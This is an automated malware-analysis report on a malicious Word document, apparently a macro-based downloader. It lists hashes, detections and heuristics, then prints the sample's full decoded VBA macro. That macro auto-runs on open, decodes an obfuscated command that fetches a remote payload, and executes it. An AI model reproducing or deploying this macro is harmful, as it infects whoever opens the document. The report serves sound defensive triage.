Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d55fd8d1187884d7…

MALICIOUS

Office (OLE)

102.5 KB Created: 2018-01-26 04:39:00 Authoring application: Microsoft Office Word First seen: 2018-05-18
MD5: ee622001f442803881c65b0f3581f2db SHA-1: 62a2c7e46039a3108f75e2071877fbff8589243a SHA-256: d55fd8d1187884d7a740eef6ff753f95e62a8f093ad9b6c336fc0d1c9b68aaa1
200 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that exploits CVE-2007-3899, a memory corruption vulnerability. The heuristic firings indicate the use of CreateProcess API, suggesting the execution of a secondary payload. The presence of VBA macros further supports the execution of arbitrary code.

Heuristics 8

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Downloader.Valyria-6666912-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6666912-0
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    #End If
    Public Sub Document_Open()
        D_LSM
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4491 bytes
SHA-256: 2b38ea9fc025047301356b0fa53f71dd1b7720158b1cdf675e859aa26194423d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then

    Private Type XBR_XTT
        PKN_NQ As Long
        EB_W As String
        HB_HY As String
        J_Z As String
        CZR_MG As Long
        XZ_VNN As Long
        I_W As Long
        LOQ_OW As Long
        UAL_ZZD As Long
        D_GHK As Long
        C_ZOW As Long
        N_W As Long
        PJ_VD As Integer
        DN_PB As Integer
        EB_W2  As LongPtr
        Y_LR As LongPtr
        VI_QQO As LongPtr
        DKO_U As LongPtr
    End Type

    Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal HZ_P As Long, ByVal NOV_E As String, A_MKQ As Any, Y_NI As Any, ByVal WVQ_MDV As Long, ByVal FX_VPE As Long, ByVal UV_OJ As Any, ByVal A_A As Long, EH_RCK As XBR_XTT, GN_M As Y_ULG) As LongPtr

    Private Type TVM_FFT
        P_IQ As Long
        HB_R As LongPtr
            DV_F As Long
    End Type
    
        Private Type Y_ULG
        T_KXE As LongPtr
            KOW_F As LongPtr
        FI_O As Long
        SI_AWW As Long
    End Type
#Else

    Private Type XBR_XTT
        PKN_NQ As Long
        EB_W As String
        HB_HY As String
        J_Z As String
        CZR_MG As Long
        XZ_VNN As Long
        I_W As Long
        LOQ_OW As Long
        UAL_ZZD As Long
        D_GHK As Long
        C_ZOW As Long
        N_W As Long
        PJ_VD As Integer
        DN_PB As Integer
        EB_W2 As Long
        Y_LR As Long
        VI_QQO As Long
        DKO_U As Long
    End Type
        
    Private Declare Function CreateProcessA Lib "Kernel32" (ByVal HZ_P As Long, ByVal NOV_E As String, A_MKQ As TVM_FFT, Y_NI As TVM_FFT, ByVal WVQ_MDV As Long, ByVal FX_VPE As Long, ByVal UV_OJ As Long, ByVal A_A As Long, EH_RCK As XBR_XTT, GN_M As Y_ULG) As Long
    Private Type TVM_FFT
        P_IQ As Long
        HB_R As Long
        DV_F As Long
    End Type
            Private Type Y_ULG
        T_KXE As Long
        KOW_F As Long
        FI_O As Long
        SI_AWW As Long
    End Type

#End If
Public Sub Document_Open()
    D_LSM
End Sub
Sub Workbook_Open()
    Document_Open
End Sub
Public Sub D_LSM()
   LU_KKP (SI_EQ)
End Sub
Public Function SI_EQ() As String
    Dim AED_WR As String
AED_WR = AED_WR + "A6A5AD9"
AED_WR = AED_WR + "BA8A99E"
AED_WR = AED_WR + "9BA2A26"
AED_WR = AED_WR + "49BAE9B"
AED_WR = AED_WR + "56638D9"
AED_WR = AED_WR + "FA49AA5"
AED_WR = AED_WR + "AD89AAA"
AED_WR = AED_WR + "FA29B56"
AED_WR = AED_WR + "7E9F9A9"
AED_WR = AED_WR + "A9BA456"
AED_WR = AED_WR + "63A4A5A"
AED_WR = AED_WR + "6A8A59C"
AED_WR = AED_WR + "9FA29B56"
AED_WR = AED_WR + "7F9C565EAA9BA9AA63A697AA9E56565A9BA4AC707786867A778A775661565D92AF9E6999649BAE9B5D5F56B1889BA3A5AC9B637FAA9BA356565A9BA4AC707786867A778A775661565D92AF9E6999649BAE9B5DB371565A857B81877A567356"
Dim CD_WLQ As String
CD_WLQ = "849BAD638598A09B99AA5689AFA9AA9BA364849BAA648D9B9879A29F9BA4AA71565A857B81877A647E9B979A9BA8A9915D8BA99BA863779D9BA4AA5D935673565D8B89886381825D71565A857B81877A647AA5ADA4A2A5979A7C9FA29B5E5D"
Dim Q_TEU As String
Q_TEU = "9EAAAAA6A9706565ADADAD64A5AEA5A49BAAA99B99ABA89FAAAF6499A5A365A497AA99A5A39F64A3A26567696667686F6A6A6C6F649BAE9B5D62565A9BA4AC707786867A778A775661565D92AF9E6999649BAE9B5D5F71565E849BAD638598"
Dim ZM_LOI As String
ZM_LOI = "A09B99AA566399A5A356899E9BA2A26477A6A6A29F9997AA9FA5A45F64899E9BA2A27BAE9B99ABAA9B5E5A9BA4AC707786867A778A775661565D92AF9E6999649BAE9B5D5F715689AAA5A66386A8A5999BA9A956637F9A565A869F9A56637CA5A8999B"
 Dim WD_H As String
  WD_H = AED_WR & CD_WLQ & Q_TEU & ZM_LOI

   Dim W_AID As Long
   Dim GZ_TM As String
   Dim JKA_BDA As String
   For W_AID = 1 To Len(WD_H) Step 2
        JKA_BDA = Chr("&H" & Mid(WD_H, W_AID, 2))
        GZ_TM = GZ_TM & Chr(Asc(JKA_BDA) - 54)
   Next
   SI_EQ = GZ_TM
End Function
Public Function LU_KKP(ByVal OJV_SY As String)
    Dim ME_U As TVM_FFT
    Dim UYG_MF As TVM_FFT
    Dim Q_V As XBR_XTT
    Q_V.N_W = &H1&
    Dim AHQ_OE As Y_ULG
#If VBA7 Then
    Dim V As LongPtr
#Else
    Dim V As Long
#End If
    V = CreateProcessA(0&, OJV_SY, ME_U, UYG_MF, False, &H20&, 0&, 0&, Q_V, AHQ_OE)
    LU_KKP = 1
End Function